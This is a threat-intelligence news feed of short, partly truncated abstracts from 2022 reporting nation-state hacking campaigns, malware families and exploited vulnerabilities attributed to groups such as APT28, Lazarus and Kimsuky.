Kimsuky APT Deploys Clever Mail-Stealing Browser Extension Called SHARPEXT Full Text
Abstract
This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky. The definition of which threat activity comprises Kimsuky is a matter of debate amongst threat intelligence analysts.Volexity
July 25, 2022
Chinese APT Group Taking Over Belgian Ministries Full Text
Abstract
The Minister for Foreign Affairs of Belgium claimed that several China-linked APT groups—APT27, APT30, and APT3—targeted the nation’s defense and interior ministries. However, the spokesperson of the Chinese Embassy in Belgium denied the accusations.Cyware Alerts - Hacker News
July 24, 2022
Is APT28 behind the STIFF#BIZON attacks attributed to North Korea-linked APT37? Full Text
Abstract
North Korea-linked APT37 group targets high-value organizations in the Czech Republic, Poland, and other countries. Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value...Security Affairs
July 22, 2022
TA4563 group leverages EvilNum malware to target European financial and investment entities Full Text
Abstract
A threat actor tracked as TA4563 is using EvilNum malware to target European financial and investment entities. A threat actor, tracked as TA4563, leverages the EvilNum malware to target European financial and investment entities, Proofpoint reported....Security Affairs
July 21, 2022
APT29 Abuses Online Storage Services Google Drive and Dropbox Full Text
Abstract
Research by Unit 42 revealed that APT29, aka Nobelium and Cozy Bear, has resorted to leveraging cloud storage services, including Google Drive, to attack multiple Western diplomatic missions. Phishing messages within included a link to a malicious HTML file, EnvyScout, that acts as a dropper to sec ... Read MoreCyware Alerts - Hacker News
July 20, 2022
Belgium claims China-linked APT groups hit its ministries Full Text
Abstract
The Minister for Foreign Affairs of Belgium blames multiple China-linked threat actors for attacks against The country's defense and interior ministries. The Minister for Foreign Affairs of Belgium revealed that multiple China-linked APT groups targeted...Security Affairs
July 19, 2022
Russia-linked APT29 relies on Google Drive, Dropbox to evade detection Full Text
Abstract
Russia-linked threat actors APT29 are using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google...Security Affairs
July 17, 2022
APT groups target journalists and media organizations since 2021 Full Text
Abstract
Researchers from Proofpoint warn that various APT groups are targeting journalists and media organizations since 2021. Proofpoint researchers warn that APT groups are regularly targeting and posing as journalists and media organizations since early...Security Affairs
July 7, 2022
North Korea-linked APTs use Maui Ransomware to target the Healthcare industry Full Text
Abstract
US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warn of North-Korea-linked...Security Affairs
July 06, 2022
Bitter APT Hackers Continue to Target Bangladesh Military Entities Full Text
Abstract
Military entities located in Bangladesh continue to be at the receiving end of sustained cyberattacks by an advanced persistent threat tracked as Bitter. "Through malicious document files and intermediate malware stages the threat actors conduct espionage by deploying Remote Access Trojans," cybersecurity firm SECUINFRA said in a new write-up published on July 5. The findings from the Berlin-headquartered company build on a previous report from Cisco Talos in May, which disclosed the group's expansion in targeting to strike Bangladeshi government organizations with a backdoor called ZxxZ . Bitter, also tracked under the codenames APT-C-08 and T-APT-17, is said to be active since at least late 2013 and has a track record of targeting China, Pakistan, and Saudi Arabia using different tools such as BitterRAT and ArtraDownloader. The latest attack chain detailed by SECUINFRA is believed to have been conducted in mid-May 2022, originating with a weaponized ExcelThe Hacker News
July 1, 2022
Evilnum APT Returns with Better TTPs Full Text
Abstract
The campaign uses macro-laden documents that have varying filenames, containing the term ‘compliance’. At least nine such documents have been identified.Cyware Alerts - Hacker News
June 30, 2022
Experts blame North Korea-linked Lazarus APT for the Harmony hack Full Text
Abstract
North Korea-linked Lazarus APT group is suspected to be behind the recent hack of the Harmony Horizon Bridge. Recently, threat actors have stolen $100 million in cryptocurrency from the Blockchain company Harmony. The company reported the incident...Security Affairs
June 28, 2022
APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor Full Text
Abstract
Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware. Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include organizations in the telecommunications, manufacturing, and transport sectors. "During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated building automation systems of one of the victims," the company said. "By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization." ShadowPad , which emerged in 2015 as the successor to PlugX, is a privately sold modular malware platform that has been put to use by many Chinese espionage actors over the years. WThe Hacker News
June 26, 2022
China-linked APT Bronze Starlight deploys ransomware as a smokescreen Full Text
Abstract
China-linked APT Bronze Starlight is deploying post-intrusion ransomware families as a diversionary action to its cyber espionage operations. Researchers from Secureworks reported that a China-linked APT group, tracked as Bronze Starlight (APT10),...Security Affairs
June 23, 2022
Chinese Tropic Trooper APT spreads a hacking tool laced with a backdoor Full Text
Abstract
China-linked APT group Tropic Trooper has been spotted previously undocumented malware written in Nim language. Check Point Research uncovered an activity cluster with ties to China-linked APT Tropic Trooper (aka Earth Centaur, KeyBoy, and Pirate...Security Affairs
June 22, 2022
Russian Hackers APT28 and UAC-0098 Target Ukraine Again Full Text
Abstract
CERT-UA issued two separate alerts unveiling the malicious activity by APT28 and UAC-0098 hacker groups as they weaponized Follina to deploy Cobalt Strike beacon and CredoMap malware, respectively. APT28 is sending emails laden with a malicious document that tries to exploit the fear among Ukr ... Read MoreCyware Alerts - Hacker News
June 21, 2022
New ToddyCat APT targets high-profile entities in Europe and Asia Full Text
Abstract
Researchers linked a new APT group, tracked as ToddyCat, to a series of attacks targeting entities in Europe and Asia since at least December 2020. Researchers from Kaspersky have linked a new APT group, tracked as ToddyCat, to a series of attacks...Security Affairs
June 20, 2022
Russian APT28 hacker accused of the NATO think tank hack in Germany Full Text
Abstract
The Attorney General has issued an arrest warrant for a hacker who targeted a NATO think tank in Germany for the Russia-linked APT28. The Attorney General has issued an arrest warrant for the Russian hacker Nikolaj Kozachek (aka "blabla1234565" and "kazak")...Security Affairs
June 17, 2022
Chinese DriftingCloud APT exploited Sophos Firewall Zero-Day before it was fixed Full Text
Abstract
China-linked threat actors exploited the zero-day flaw CVE-2022-1040 in Sophos Firewall weeks before it was fixed by the security vendor. Volexity researchers discovered that the zero-day vulnerability, tracked as CVE-2022-1040, in Sophos Firewall...Security Affairs
June 15, 2022
Gallium Group Expands to New Geographical Areas with PingPull RAT Full Text
Abstract
Chinese state-sponsored Gallium APT group is using a new, difficult-to-detect RAT—PingPull—in its espionage campaigns. The RAT can leverage ICMP, raw TCP, and HTTP(S) protocols for C2 communication. The targeted entities are based in Australia, Russia, the Philippines, Belgium, Vietnam, Malaysia, C ... Read MoreCyware Alerts - Hacker News
June 13, 2022
Russia-linked APT targets Ukraine by exploiting the Follina RCE vulnerability Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT) warns that the Russia-linked Sandworm APT group may exploit the Follina RCE vulnerability. Ukraine's Computer Emergency Response Team (CERT) is warning that the Russia-linked Sandworm APT may be exploiting...Security Affairs
June 13, 2022
GALLIUM APT used a new PingPull RAT in recent campaigns Full Text
Abstract
China-linked Gallium APT employed a previously undocumented RAT, tracked as PingPull, in recent cyber espionage campaign targeting South Asia, Europe, and Africa. China-linked Gallium APT (aka Softcell) used a previously undocumented remote access...Security Affairs
June 11, 2022
Iran-linked Lyceum APT adds a new .NET DNS Backdoor to its arsenal Full Text
Abstract
Iran-linked Lyceum APT group uses a new .NET-based DNS backdoor to target organizations in the energy and telecommunication sectors. The Iran-linked Lyceum APT group, aka Hexane or Spilrin, used a new .NET-based DNS backdoor in a campaign aimed at companies...Security Affairs
June 9, 2022
Previously undocumented Aoqin Dragon APT targets entities in Southeast Asia and Australia Full Text
Abstract
Researchers spotted a previously undocumented Chinese-speaking APT, tracked as Aoqin Dragon, targeting entities in Southeast Asia and Australia. SentinelOne documented a series of attacks aimed at government, education, and telecom entities in Southeast...Security Affairs
June 9, 2022
Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years Full Text
Abstract
The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread the malware and infect additional targets.Sentinel One
June 6, 2022
Microsoft seized 41 domains used by Iran-linked Bohrium APT Full Text
Abstract
Microsoft's Digital Crimes Unit (DCU) announced the seizure of domains used by Iran-linked APT Bohrium in spear-phishing campaigns. Microsoft's Digital Crimes Unit (DCU) announced to have taken legal action to disrupt a spear-phishing operation...Security Affairs
June 3, 2022
LuoYu APT delivers WinDealer malware via man-on-the-side attacks Full Text
Abstract
Chinese LuoYu Hackers Using Man-on-the-Side Attacks to Deploy WinDealer Backdoor An "extremely sophisticated" China-linked APT tracked as LuoYu was delivering malware called WinDealer via man-on-the-side attacks. Researchers from Kaspersky have...Security Affairs
June 3, 2022
SideWinder Launched More than 1,000 Attacks in Two Years Full Text
Abstract
The SideWinder APT has launched more than 1,000 attacks while leveraging over 400 domains and subdomains, with additional stealth mechanisms. The threat group is maintaining a large C2 infrastructure comprising more than 400 domains and subdomains that were used to host malicious payloads and manag ... Read MoreCyware Alerts - Hacker News
June 1, 2022
China-linked TA413 group actively exploits Microsoft Follina zero-day flaw Full Text
Abstract
A China-linked APT group is actively exploiting the recently disclosed Follina zero-day flaw in Microsoft Office in attacks in the wild. China-linked APT group TA413 has been observed exploiting the recently disclosed Follina zero-day flaw (tracked...Security Affairs
May 31, 2022
Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability Full Text
Abstract
An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems. "TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in a tweet. "Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app." TA413 is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox browser extension dubbed FriarFox . The high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the "ms-msdt:" protocol URI scheme to execute arbitrary code. SpecificThe Hacker News
May 31, 2022
SideWinder carried out over 1,000 attacks since April 2020 Full Text
Abstract
SideWinder, an aggressive APT group, is believed to have carried out over 1,000 attacks since April 2020, Kaspersky reported. Researchers from Kaspersky have analyzed the activity of an aggressive threat actor tracked as SideWinder (aka RattleSnake...Security Affairs
May 31, 2022
Windows MSDT zero-day now exploited by Chinese APT hackers Full Text
Abstract
Chinese-linked threat actors are now actively exploiting a Microsoft Office zero-day vulnerability (known as 'Follina') to execute malicious code remotely on Windows systems.BleepingComputer
May 28, 2022
Experts believe that Russian Gamaredon APT could fuel a new round of DDoS attacks Full Text
Abstract
360 Qihoo reported DDoS attacks launched by APT-C-53 (aka Gamaredon) conducted through the open-source DDoS Trojan program LOIC. Researchers at 360 Qihoo observed a wave of DDoS attacks launched by Russia-linked APT-C-53 (aka Gamaredon) and reported...Security Affairs
May 28, 2022
Reuters: Russia-linked APT behind Brexit leak website Full Text
Abstract
Russia-linked threat actors are behind a new website that published leaked emails from leading proponents of Britain's exit from the EU, the Reuters reported. According to a Google cybersecurity official and the former head of UK foreign intelligence,...Security Affairs
May 25, 2022
Unknown APT group is targeting Russian government entities Full Text
Abstract
An unknown APT group is targeting Russian government entities since the beginning of the Russian invasion of Ukraine. Researchers from Malwarebytes observed an unknown Advanced Persistent Threat (APT) group targeting Russian government entities with...Security Affairs
May 24, 2022
Twisted Panda: Chinese APT Targets Russian Orgs Full Text
Abstract
The targeted attack, dubbed Twisted Panda, has been going on since at least June 2021 and spied on at least two Russian defense research institutes and another unknown target in Belarus.Cyware Alerts - Hacker News
May 24, 2022
Unknown APT group has targeted Russia repeatedly since Ukraine invasion Full Text
Abstract
An unknown Advanced Persistent Threat (APT) group has targeted Russian government entities through at least four separate spear-phishing campaigns since late February 2022.Malwarebytes Labs
May 23, 2022
Russia-linked Turla APT targets Austria, Estonia, and NATO platform Full Text
Abstract
Russia-linked APT group Turla was observed targeting the Austrian Economic Chamber, a NATO eLearning platform, and the Baltic Defense College. Researchers from SEKOIA.IO Threat & Detection Research (TDR) team have uncovered a reconnaissance...Security Affairs
May 22, 2022
North Korea-linked Lazarus APT uses Log4J to target VMware servers Full Text
Abstract
North Korea-linked Lazarus APT is exploiting the Log4J remote code execution (RCE) in attacks aimed at VMware Horizon servers. North Korea-linked group Lazarus is exploiting the Log4J RCE vulnerability (CVE-2021-44228) to compromise VMware Horizon...Security Affairs
May 21, 2022
Russia-linked Sandworm continues to conduct attacks against Ukraine Full Text
Abstract
Security researchers from ESET reported that the Russia-linked APT group Sandworm continues to target Ukraine. Security experts from ESET reported that the Russia-linked cyberespionage group Sandworm continues to launch cyber attacks against entities...Security Affairs
May 19, 2022
China-linked Space Pirates APT targets the Russian aerospace industry Full Text
Abstract
A new China-linked cyberespionage group known as 'Space Pirates' is targeting enterprises in the Russian aerospace industry. A previously unknown Chinese cyberespionage group, tracked as 'Space Pirates', targets enterprises in the Russian aerospace...Security Affairs
May 18, 2022
Bangladesh Added to Targets in Bitter APT’s Ongoing Campaign Full Text
Abstract
Cisco Talos revealed an ongoing campaign operated by the APT actor since August 2021. The campaign has been launched against an elite unit of the Bangladeshi government via spear-phishing emails.Cyware Alerts - Hacker News
May 15, 2022
Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT Full Text
Abstract
Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware. Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject...Security Affairs
May 11, 2022
Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia Full Text
Abstract
An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor. "Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including China , Pakistan, and Saudi Arabia," Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, told The Hacker News. "And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise." Bitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hackingThe Hacker News
May 11, 2022
Bitter APT Adds Bangladesh to its Targets Full Text
Abstract
Bitter APT, known for targeting China, Pakistan, and Saudi Arabia, reportedly added Bangladesh to its list of targets as researchers find malicious emails sent to officers of the Bangladesh police.Cisco Talos
May 7, 2022
Researchers Associate North-Korean APT38 Group with More Ransomware Strains Full Text
Abstract
A threat researcher from Trellix claimed that APT38 operators (aka Unit 180 of North Korea) have used Beaf, ZZZZ, ChiChi, and PXJ ransomware strains to extort some of their victims.Cyware Alerts - Hacker News
May 7, 2022
UNC3524 APT Has Got Backdoors, Persistency Tactics Under Its Sleeves Full Text
Abstract
Experts noted that UNC3524 has been persistently targeting the emails of employees in the corporate world that focus on development, mergers and acquisitions, and large transactions, with financial motivation.Cyware Alerts - Hacker News
May 7, 2022 <br {:=”” .fs-4=”” .fw-700=”” .lh-0=”” }=”” <p=”” style=”font-weight:500; margin:0px” markdown=”1”> US gov sanctions cryptocurrency mixer Blender also used by North Korea-linked Lazarus APT Full Text
Abstract
The U.S. Department of Treasury sanctioned cryptocurrency mixer Blender.io used by North Korea-linked Lazarus APT. The U.S. Department of Treasury sanctioned the cryptocurrency mixer Blender.io used by the North Korea-linked Lazarus APT to launder...Security Affairs
May 5, 2022
Winnti APT Returns in New Operation CuckooBees Campaign Full Text
Abstract
The covert attack campaign was aimed at multiple technology and manufacturing organizations across North America, Western Europe, and East Asia, with an aim of stealing intellectual property.Cyware Alerts - Hacker News
May 4, 2022
APT29 Phishing Campaigns Target Government and Diplomats Full Text
Abstract
The phishing emails pretended to contain policy updates and originated from legitimate email addresses belonging to embassies. The campaign lasted from January to March 2022.Cyware Alerts - Hacker News
May 4, 2022
China-linked Winnti APT steals intellectual property from companies worldwide Full Text
Abstract
A sophisticated cyberespionage campaign, dubbed Operation CuckooBees, conducted by the China-linked Winnti group remained undetected since at least 2019. Researchers from Cybereason uncovered a sophisticated cyberespionage campaign, dubbed Operation...Security Affairs
May 4, 2022
China-linked APT Caught Pilfering Treasure Trove of IP Full Text
Abstract
A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.Threatpost
May 4, 2022
Experts linked multiple ransomware strains North Korea-backed APT38 group Full Text
Abstract
Researchers from Trellix linked multiple ransomware strains to the North Korea-backed APT38 group. The ransomware was employed in attacks on financial institutions, experts estimated that APT38 (Unit 180 of North Korea's cyber-army Bureau 121) has stolen...Security Affairs
May 3, 2022
China-linked APT Curious Gorge targeted Russian govt agencies Full Text
Abstract
China-linked Curious Gorge APT is targeting Russian government agencies, Google Threat Analysis Group (TAG) warns. Google Threat Analysis Group (TAG) reported that an APT group linked to China's People's Liberation Army Strategic Support Force (PLA...Security Affairs
May 3, 2022
China-linked Moshen Dragon abuses security software to sideload malware Full Text
Abstract
A China-linked APT group, tracked as Moshen Dragon, is exploiting antivirus products to target the telecom sector in Asia. A China-linked APT group, tracked as Moshen Dragon, has been observed targeting the telecommunication sector in Central Asia...Security Affairs
May 3, 2022
UNC3524 APT uses IP cameras to deploy backdoors and target Exchange Full Text
Abstract
A new APT group, tracked as UNC3524, uses IP cameras to deploy backdoors and steal Microsoft Exchange emails. Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees that focus on corporate...Security Affairs
May 2, 2022
Russia-linked APT29 targets diplomatic and government organizations Full Text
Abstract
Russia-linked APT29 (Cozy Bear or Nobelium) launched a spear-phishing campaign targeting diplomats and government entities. In mid-January 2022, security researchers from Mandiant have spotted a spear-phishing campaign, launched by the Russia-linked...Security Affairs
April 28, 2022
North Korean APT37 Targets Journalists with GoldBackdoor Full Text
Abstract
APT37, suspected to have ties with the North Korean government, was found targeting journalists with sophisticated info-stealer malware dubbed Goldbackdoor. The emails sent to the journalists included a link to download ZIP archives with LNK files. Targets are advised to ensure they don’t open any ... Read MoreCyware Alerts - Hacker News
April 26, 2022
Iran-linked APT Rocket Kitten exploited VMware bug in recent attacks Full Text
Abstract
The Iran-linked APT group Rocket Kitten has been observed exploiting a recently patched CVE-2022-22954 VMware flaw. Iran-linked Rocket Kitten APT group has been observed exploiting a recently patched CVE-2022-22954 VMware Workspace ONE Access flaw...Security Affairs
April 26, 2022
North Korea-linked APT37 targets journalists with GOLDBACKDOOR Full Text
Abstract
North Korea-linked APT37 group is targeting journalists that focus on DPRK with a new piece of malware. North Korea-linked APT37 group (aka Ricochet Chollima) has been spotted targeting journalists focusing on DPRK with a new piece of malware. The...Security Affairs
April 20, 2022
Russian Gamaredon APT continues to target Ukraine Full Text
Abstract
Russia-linked threat actor Gamaredon targets Ukraine with new variants of the custom Pterodo backdoor. Russia-linked Gamaredon APT group (a.k.a. Armageddon, Primitive Bear, and ACTINIUM) continues to target Ukraine and it is using new variants...Security Affairs
April 16, 2022
U.S. Gov believes North Korea-linked Lazarus APT is behind Ronin Validator cyber heist Full Text
Abstract
The U.S. government blames North Korea-linked APT Lazarus for the recent $600 million Ronin Validator cyber heist. The U.S. government attributes the recent $600 million Ronin Validator cryptocurrencty heist to the North Korea-linked APT Lazarus. The...Security Affairs
April 14, 2022
Feds: APTs Have Tools That Can Take Over Critical Infrastructure Full Text
Abstract
Threat actors have developed custom modules to compromise various ICS devices as well as Windows workstations that pose an imminent threat, particularly to energy providers.Threatpost
April 13, 2022
U.S. Warns of APT Hackers Targeting ICS/SCADA Systems with Specialized Malware Full Text
Abstract
The U.S. government on Wednesday warned of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices. "The APT actors have developed custom-made tools for targeting ICS/SCADA devices," multiple U.S. agencies said in an alert. "The tools enable them to scan for, compromise, and control affected devices once they have established initial access to the operational technology (OT) network." The joint federal advisory comes courtesy of the U.S. Department of Energy (DoE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI). The custom-made tools are specifically designed to single out Schneider Electric programmable logic controllers (PLCs), OMRON Sysmac NEX PLCs, and Open Platform Communications Unified Architecture (OPC UA) servers. On top of that, the unnamed actorsThe Hacker News
April 13, 2022
China-linked Hafnium APT leverages Tarrask malware to gain persistence Full Text
Abstract
China-linked Hafnium APT group started using a new piece of new malware to gain persistence on compromised Windows systems. The China-backed Hafnium cyberespionage group is likely behind a piece of a new malware, dubbed Tarrask, that's used to maintain...Security Affairs
April 12, 2022
Russia-linked Sandworm APT targets energy facilities in Ukraine with wipers Full Text
Abstract
Russia-linked Sandworm APT group targeted energy facilities in Ukraine with INDUSTROYER2 and CADDYWIPER wipers. Russia-linked Sandworm threat actors targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2)...Security Affairs
April 8, 2022
Microsoft disrupted APT28 attacks on Ukraine through a court order Full Text
Abstract
Microsoft obtained a court order to take over seven domains used by the Russia-linked APT28 group to target Ukraine. Microsoft on Thursday announced it has obtained a court order to take over seven domains used by Russia-linked cyberespionage group...Security Affairs
April 07, 2022
Microsoft takes down APT28 domains used in attacks against Ukraine Full Text
Abstract
Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure.BleepingComputer
April 5, 2022
Russia-linked Armageddon APT targets Ukrainian state organizations, CERT-UA warns Full Text
Abstract
Ukraine CERT-UA spotted a spear-phishing campaign conducted by Russia-linked Armageddon APT targeting local state organizations. Ukraine CERT-UA published a security advisory to warn of spear-phishing attacks conducted by Russia-linked Armageddon...Security Affairs
April 4, 2022
Experts spotted a new Android malware while investigating by Russia-linked Turla APT Full Text
Abstract
Researchers spotted a new piece of Android malware while investigating activity associated with Russia-linked APT Turla. Researchers at cybersecurity firm Lab52 discovered a new piece of Android malware while investigating into infrastructure associated...Security Affairs
April 3, 2022
China-linked APT Deep Panda employs new Fire Chili Windows rootkit Full Text
Abstract
The China-linked hacking group Deep Panda is targeting VMware Horizon servers with the Log4Shell exploit to install a new Fire Chili rootkit. Researchers from Fortinet have observed the Chinese APT group Deep Panda exploiting a Log4Shell exploit...Security Affairs
March 28, 2022
GhostWriter APT targets state entities of Ukraine with Cobalt Strike Beacon Full Text
Abstract
Ukraine CERT-UA warns that the Belarus-linked GhostWriter APT group is targeting state entities of Ukraine with Cobalt Strike Beacon. Ukraine CERT-UA uncovered a spear-phishing campaign conducted by Belarus-linked GhostWriter APT group targeting Ukrainian...Security Affairs
March 24, 2022
Chinese APT Hackers Targeting Betting Companies in Southeast Asia Full Text
Abstract
A Chinese-speaking advanced persistent threat (APT) has been linked to a new campaign targeting gambling-related companies in South East Asia, particularly Taiwan, the Philippines, and Hong Kong. Cybersecurity firm Avast dubbed the campaign Operation Dragon Castling , describing its malware arsenal as a "robust and modular toolset." The ultimate motives of the threat actor are not immediately discernible as yet nor has it been linked to a known hacking group. While multiple initial access avenues were employed during the course of the campaign, one of the attack vectors involved leveraging a previously unknown remote code execution flaw in the WPS Office suite ( CVE-2022-24934 ) to backdoor its targets. The issue has since been addressed by Kingsoft Office, the developers of the office software. In the case observed by the Czech security firm, the vulnerability was used to drop a malicious binary from a fake update server with the domain update.wps[.]cn that triggers a mThe Hacker News
March 24, 2022
Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection Full Text
Abstract
Mustang Panda’s already sophisticated cyberespionage campaign has matured even further with the introduction of a brand-new PlugX RAT variant.Threatpost
March 23, 2022
China-linked GIMMICK implant now targets macOS Full Text
Abstract
Gimmick is a newly discovered macOS implant developed by the China-linked APT Storm Cloud and used to target organizations across Asia. In late 2021, Volexity researchers investigated an intrusion in an environment they were monitoring and discovered...Security Affairs
March 23, 2022
APT Group Targets Betting Companies Using MulCom Backdoor in Taiwan, the Philippines, and Hong Kong Full Text
Abstract
Due to the similarities between the MulCom backdoor used by this group and FFRat, researchers suspect that the FFRat codebase is being shared between several Chinese adversary groups.Avast
March 22, 2022
Russia-linked InvisiMole APT targets state organizations of Ukraine Full Text
Abstract
Ukraine CERT (CERT-UA) warns of spear-phishing attacks conducted by UAC-0035 group (aka InvisiMole) on state organizations of Ukraine. The Government Team for Response to Computer Emergencies of Ukraine (CERT-UA) warns of spear-phishing messages...Security Affairs
March 14, 2022
Researchers Find New Evidence Linking Kwampirs Malware to Shamoon APT Hackers Full Text
Abstract
New findings released last week showcase the overlapping source code and techniques between the operators of Shamoon and Kwampirs , indicating that they "are the same group or really close collaborators." "Research evidence shows identification of co-evolution between both Shamoon and Kwampirs malware families during the known timeline," Pablo Rincón Crespo of Cylera Labs said . "If Kwampirs is based on the original Shamoon, and Shamoon 2 and 3 campaign code is based on Kwampirs, […] then the authors of Kwampirs would be potentially the same as the authors of Shamoon, or must have a very strong relationship, as has been seen over the course of many years," Rincón Crespo added. Shamoon, also known as DistTrack, functions as an information-stealing malware that also incorporates a destructive component that allows it to overwrite the Master Boot Record (MBR) with arbitrary data so as to render the infected machine inoperable. The malware, developedThe Hacker News
March 9, 2022
APT41 Spies Broke Into 6 US State Networks via a Livestock App Full Text
Abstract
The China-affiliated state-sponsored threat actor used Log4j and zero-day bugs in the USAHerds animal-tracking software to hack into multiple government networks.Threatpost
March 9, 2022
Russian APTs Furiously Phish Ukraine – Google Full Text
Abstract
Also on the rise: DDoS attacks against Ukrainian sites and phishing activity capitalizing on the conflict, with China’s Mustang Panda targeting Europe.Threatpost
March 9, 2022
Google blocked China-linked APT31’s attacks targeting U.S. Government Full Text
Abstract
Google has blocked a phishing campaign conducted by China-linked group APT31 aimed at Gmail users associated with the U.S. government. Google announced to have blocked a phishing campaign originating conducted by China-linked cybereaspionage group...Security Affairs
March 09, 2022
Chinese APT41 Hackers Broke into at Least 6 U.S. State Governments: Mandiant Full Text
Abstract
APT41, the state-sponsored threat actor affiliated with China, breached at least six U.S. state government networks between May 2021 and February 2022 by retooling its attack vectors to take advantage of vulnerable internet-facing web applications. The exploited vulnerabilities included "a zero-day vulnerability in the USAHERDS application ( CVE-2021-44207 ) as well as the now infamous zero-day in Log4j ( CVE-2021-44228 )," researchers from Mandiant said in a report published Tuesday, calling it a "deliberate campaign." Besides web compromises, the persistent attacks also involved the weaponization of exploiting deserialization, SQL injection, and directory traversal vulnerabilities, the cybersecurity and incident response firm noted. The prolific advanced persistent threat, also known by the monikers Barium and Winnti, has a track record of targeting organizations in both the public and private sectors to orchestrate espionage activity in parallel with fiThe Hacker News
March 8, 2022
Google TAG: Russia, Belarus-linked APTs targeted Ukraine Full Text
Abstract
Google TAG observed Russian, Belarusian, and Chinese threat actors targeting Ukraine and European government and military orgs. Google Threat Analysis Group (TAG), which focuses on the analysis of nation-state threat actors, revealed to have blocked...Security Affairs
March 8, 2022
China-linked TA416 Increases Attack Activity Against European Governments as Conflict in Ukraine Escalates Full Text
Abstract
The campaigns utilize web bugs to profile the victims before sending a variety of PlugX malware payloads via malicious URLs. TA416 has recently updated its PlugX malware variant.Proof Point
March 1, 2022
China-linked APT used Daxin, one of the most sophisticated backdoor even seen Full Text
Abstract
Daxin is the most advanced backdoor in the arsenal of China-linked threat actors designed to avoid the detection of sophisticated defense systems. Symantec researchers discovered a highly sophisticated backdoor, named Daxin, which is being used...Security Affairs
February 28, 2022
Iran-linked UNC3313 APT employed two custom backdoors against a Middle East gov entity Full Text
Abstract
An Iran-linked threat actor, tracked as UNC3313, was observed using two custom backdoor against an unnamed Middle East government entity. UNC3313 is an Iran-linked threat actor that was linked with "moderate confidence" to the MuddyWater nation-state...Security Affairs
February 25, 2022
Ukraine: Belarusian APT group UNC1151 targets military personnel with spear phishing Full Text
Abstract
The CERT of Ukraine (CERT-UA) warned of a spear-phishing campaign targeting Ukrainian armed forces personnel. The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of an ongoing spear-phishing campaign targeting private email accounts...Security Affairs
February 23, 2022
Operation Cache Panda - Chinese APT10 Targets Taiwan Full Text
Abstract
Taiwanese cybersecurity firm CyCraft attributed months-long attacks against Taiwan’s financial sector to the APT10 group (aka Stone Panda or Bronze Riverside), which is affiliated with the Chinese government.Cyware Alerts - Hacker News
February 22, 2022
China-linked APT10 Target Taiwan’s financial trading industry Full Text
Abstract
China-linked APT group APT10 (aka Stone Panda, Bronze Riverside) targets Taiwan's financial trading sector with a supply chain attack. The campaign was launched by the APT10 group started in November 2021, but it hit a peak between 10 and 13 2022,...Security Affairs
February 21, 2022
TunnelVision APT Group Exploits Log4Shell Full Text
Abstract
SentinelOne allegedly stumbled across an Iranian threat actor, dubbed TunnelVision, exploiting the Log4j vulnerability on unpatched VMware Horizon servers with ransomware. The group exploited multiple one-day flaws, such as FortiOS (CVE-2018-13379) and Exchange (ProxyShell). The TTPs of TunnelVisio ... Read MoreCyware Alerts - Hacker News
February 18, 2022
Iran-linked TunnelVision APT is actively exploiting the Log4j vulnerability Full Text
Abstract
Iran-linked TunnelVision APT group is actively exploiting the Log4j vulnerability to deploy ransomware on unpatched VMware Horizon servers. Researchers from SentinelOne have observed the potentially destructive Iran-linked APT group TunnelVision...Security Affairs
February 18, 2022
Iran-linked TunnelVision APT is actively exploiting the Log4j vulnerability Full Text
Abstract
SentinelOne observed the potentially destructive Iran-linked APT group TunnelVision actively exploiting the Log4j vulnerability to deploy ransomware on unpatched VMware Horizon servers.Security Affairs
February 17, 2022
